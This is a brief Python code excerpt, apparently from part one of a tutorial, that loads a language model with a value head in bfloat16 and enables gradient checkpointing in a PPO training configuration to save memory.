model = AutoModelForCausalLMWithValueHead.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,  # 16-bit weights use half the memory of float32
    device_map="auto",           # Automatic GPU/CPU distribution
)

# Enable gradient checkpointing
ppo_config = PPOConfig(
    gradient_checkpointing=True,  # Trade compute for memory
    # ...
)
```

End of part 1
